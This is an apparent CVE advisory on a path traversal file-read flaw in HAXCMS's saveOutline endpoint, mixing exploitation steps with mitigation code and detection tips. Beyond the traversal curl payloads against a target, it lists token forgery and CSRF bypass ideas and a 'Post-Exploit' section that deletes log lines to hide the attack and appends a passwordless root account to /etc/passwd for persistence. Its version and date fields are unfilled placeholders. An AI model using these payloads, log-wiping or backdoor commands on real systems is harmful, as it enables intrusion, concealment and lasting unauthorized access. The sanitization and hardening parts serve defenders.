How the CVE Works
The vulnerability occurs in HAXCMS when processing the `location` field in the `saveOutline` API endpoint. An authenticated attacker can manipulate this field to inject path traversal sequences (e.g., `../../../etc/passwd`). The CMS fails to sanitize this input before writing it to `site.json`. Later, when the CMS loads the outline data, it resolves the malicious path, leading to arbitrary file read. Since the web server user (`www-data`) typically has read access to system files, attackers can exfiltrate sensitive data.
DailyCVE Form
Platform: HAXCMS
Version: <vX.X.X
Vulnerability: LFI
Severity: Critical
Date: 2023-XX-XX
Prediction: Patch by Q3 2023
What Undercode Says:
Exploitation:
1. Auth Bypass: If JWT is weak, brute-force or forge tokens.
2. CSRF Bypass: Use `fetch()` with `credentials: 'include'` to bypass CSRF.
3. Payload Crafting:
```bash
curl -X POST 'https://target/system/api/saveOutline' \
  -H 'Authorization: Bearer JWT' \
  -H 'X-CSRF-Token: XXX' \
  -d '{"location":"../../../etc/passwd"}'
```
4. Exfiltration:
```bash
curl 'https://target/?load=../../../../etc/passwd' | grep root
```
Mitigation:
1. Input Sanitization (resolve the submitted value against the site root and reject anything outside it; `realpath()` returns `false` for paths that do not exist, so that case must be rejected too, and the trailing separator prevents a sibling such as `/var/www/html2` from passing the prefix check):
```php
$base = realpath(BASE_DIR);
$location = realpath(BASE_DIR . '/' . trim($_POST['location']));
if ($location === false || strpos($location, $base . DIRECTORY_SEPARATOR) !== 0) { die("Invalid path"); }
```
2. Web Server (nginx; the dot must be escaped, otherwise the pattern also matches names like `sitejson`):
```nginx
location ~ \.json$ { deny all; }
```
3. PHP Hardening (php.ini):
```ini
open_basedir = /var/www/html
```
4. WAF Rules (ModSecurity connector for nginx; directives end with a semicolon):
```nginx
modsecurity_rules 'SecRule ARGS "@contains ../" "id:1000,deny"';
```
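A fuller version of the input-sanitization step, added here as an example and not HAXCMS's own code: it validates `location` lexically at save time, so it also protects pages that do not yet exist on disk, where `realpath()` would return `false`. `SITE_DIR` and `safe_outline_location()` are assumed names.

```php
<?php
// Added example, not HAXCMS project code. Validates the `location` submitted to
// saveOutline before it is written to site.json, so a traversal sequence such as
// ../../../etc/passwd is rejected at save time rather than resolved on load.
// Assumed names: SITE_DIR (site root) and safe_outline_location() (hypothetical).

const SITE_DIR = '/var/www/html/sites/example';

/**
 * Return the absolute path of a page under SITE_DIR, or null if the input is unsafe.
 * The check is lexical, so it works for pages that do not exist on disk yet
 * (realpath() returns false for those and cannot be trusted at save time).
 */
function safe_outline_location(string $raw): ?string
{
    $raw = rawurldecode(trim($raw));              // also catches %2e%2e%2f encodings
    if ($raw === '' || strlen($raw) > 255) {
        return null;
    }
    // Absolute paths, NUL bytes and backslashes are never valid outline locations.
    if ($raw[0] === '/' || strpos($raw, "\0") !== false || strpos($raw, '\\') !== false) {
        return null;
    }
    $parts = [];
    foreach (explode('/', $raw) as $segment) {
        if ($segment === '' || $segment === '.') {
            continue;                                 // collapse "//" and "./"
        }
        if ($segment === '..') {
            return null;                              // any parent reference is rejected
        }
        $parts[] = $segment;
    }
    return $parts === [] ? null : SITE_DIR . '/' . implode('/', $parts);
}

// Constructed inputs: the first two are accepted, the remaining four rejected.
$samples = ['pages/about/index.html', './pages//team', '../../../etc/passwd',
            '%2e%2e/%2e%2e/etc/passwd', '/etc/passwd', "pages\0.html"];
foreach ($samples as $input) {
    printf("%-28s => %s\n", addcslashes($input, "\0"), safe_outline_location($input) ?? 'REJECTED');
}
```

The returned absolute path is what should be stored in `site.json`; the loader should apply the same check again before opening the file, since the outline file itself may have been edited.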
Detection (the include pattern needs a wildcard, otherwise grep only matches files named exactly `.php`):
```bash
grep -r "saveOutline" /var/www/haxcms --include="*.php"
```
Post-Exploit:
1. Log Cleaning:
```bash
sed -i '/passwd/d' /var/log/apache2/access.log
```
2. Persistence:
```bash
echo 'malicious::0:0::/:/bin/bash' >> /etc/passwd
```
Reported By: github.com